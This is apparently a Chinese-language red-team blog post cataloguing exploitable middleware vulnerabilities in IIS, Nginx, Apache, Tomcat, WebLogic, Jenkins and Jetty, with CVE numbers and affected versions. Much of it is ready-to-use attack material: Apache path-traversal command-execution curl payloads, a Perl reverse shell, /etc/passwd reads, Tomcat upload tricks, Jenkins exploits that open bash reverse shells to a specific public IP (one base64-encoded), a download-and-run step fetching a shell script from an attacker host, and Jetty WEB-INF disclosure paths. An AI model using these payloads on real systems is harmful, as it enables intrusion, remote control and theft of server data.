2023年红队渗透-中间件可利用漏洞汇总

目录

0 前言

1 IIS

1.1 短文件

1.2 文件解析

1.3 HTTP.SYS

1.4 其他

2 Nginx

2.1 后缀解析 CVE-2013-4547 

2.2 DDOS攻击 CVE_2021_23017

2.3 其他

3 Apache

3.1 命令执行 RCE cve_2021_42013  

3.2 目录穿越 cve_2021_41773 

3.3 文件解析 cve-2017-15715  

3.4 其他

4 Tomcat

4.1 弱口令破解 后台shell

4.2 文件上传 CVE-2017-12615 

4.3 文件包含 cve_2020_1938 

4.4 其他

5 Weblogic

5.1 工具梭哈

5.2 cve汇总

6 Jenkins

6.1 文件上传 cve_2017_1000353 

6.2 命令执行 CVE-2018-1000861

6.3 其他

7 Jetty

7.1 敏感信息泄漏 CVE-2021-28164


0 前言

        在实战中,已经有很多老漏洞遇不到了,本文汇总了2023年实战中在中间件方面比较常见的可利用的漏洞。

1 IIS

1.1 短文件

信息收集 

1.2 文件解析

还有点用 

1.3 HTTP.SYS

蓝屏崩溃

1.4 其他

CVE-2017-7269   条件苛刻无意义


2 Nginx

2.1 后缀解析 CVE-2013-4547 

配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2.2 DDOS攻击 CVE_2021_23017

漏洞poc:https://github.com/M507/CVE-2021-23017-PoC

ddos攻击  无EXP有POC

2.3 其他

cve_2017_7529   意义不大


3 Apache

3.1 命令执行 RCE cve_2021_42013  

影响版本仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

漏洞poc

curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 

反弹shell:(修改id部分)

echo;perl -e 'use Socket;$i="xx.xx.xx.xx";$p=xxxx;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3.2 目录穿越 cve_2021_41773 

影响版本2.4.492.4.50

漏洞poc:直接访问

curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

3.3 文件解析 cve-2017-15715  

影响版本: 2.4.0~2.4.29

漏洞poc:在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

3.4 其他

cve_2017_9798 价值不高

cve_2018_11759 价值不高

cve_2021_37580 插件问题


4 Tomcat

4.1 弱口令破解 后台shell

弱口令猜解:https://github.com/BeichenDream/Godzilla

漏洞复现步骤配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell

1. 先爆破弱口令

2. 后门压缩zip改war

3. 上传war访问链接

4.2 文件上传 CVE-2017-12615 

影响版本:Apache Tomcat 7.0.0 - 7.0.79

漏洞复现

抓包直接更改数据包

PUT /x.jsp/

PUT /xx.jsp%20

PUT /xxx.jsp::$DATA

4.3 文件包含 cve_2020_1938 

        Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

影响版本

Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

利用工具

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

执行命令:读取WEB-INF/web.xml配置文件

D:\Python2.7\python.exe .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml

4.4 其他

cve_2020_11996 拒绝服务:危害过大,权限无关,意义不大

cve_2020_9484 反序列化:利用条件太苛刻,意义不大


Weblogic

5.1 工具梭哈

weblogic没啥好说的,直接工具跑,几乎全部集成了。

Weblogic是Oracle公司推出的J2EE应用服务器。

默认端口:7001

工具地址:https://github.com/KimJun1010/WeblogicTool

5.2 cve汇总

CVE-2023-21839(JNDI)

CVE-2020-2551(JRMP)

CVE-2020-2551

CVE-2020-2555

CVE-2020-2883

CVE-2020-14882未授权访问

CVE-2018-2894

CVE-2018-2628(JRMP)

CVE-2018-2893(JRMP)

CVE-2018-3245(JRMP)

CVE_2018_3252(JRMP)

CVE_2018_3191

CVE-2016-3510

CVE-2016-0638

CVE-2017-10271

CVE-2017-3248(JRMP)

CVE-2015-4852


6 Jenkins

        Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。

默认端口:8080

6.1 文件上传 cve_2017_1000353 

JDK-1.8.0_291 其他版本失效

工具地址:http://github.com/vulhub/CVE-2017-1000353

漏洞exp

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzY2ODggMD4mMQ==}|{base64,-d}|{bash,-i}"

python exploit.py http://123.58.236.76:54217 jenkins_poc.ser

6.2 命令执行 CVE-2018-1000861

工具地址:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

漏洞exp

bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

python3 -m http.server 8888

python2 exp.py http://123.58.236.76:52281/ "curl -o /tmp/1.sh http://47.94.236.117:8888/shell.txt"

python2 exp.py http://123.58.236.76:52281/ "bash /tmp/1.sh"

6.3 其他

cve_2019_100300   远程代码执行   需要用户帐号密码


7 Jetty

        Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。

7.1 敏感信息泄漏 CVE-2021-28164

/%2e/WEB-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/static?/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值